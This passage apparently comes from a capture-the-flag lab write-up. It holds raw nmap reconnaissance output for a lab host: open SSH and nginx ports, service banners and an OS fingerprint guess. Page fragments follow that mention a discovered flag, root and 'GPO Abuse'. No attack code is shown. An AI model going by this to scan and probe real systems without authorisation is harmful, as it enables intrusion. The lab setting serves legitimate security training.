| 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open http syn-ack ttl 127 nginx 1.22.1
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2022
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows Server 2022 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/12%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68C4E712%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=107%TS=A)
SEQ(SP=106%GCD=1%ISR=108%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=N)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.734 days (since Fri Sep 12 06:00:56 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 74.39 ms 10.10.14.1
2 75.72 ms 10.10.11.54
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 12 23:37:54 2025 -- 1 IP address (1 host up) scanned in 155.09 secondsScripts / Automation
Flag Discovered
Root
10.10.11.54
Administrator
GPO Abuse
<SNIF>
d
Last updated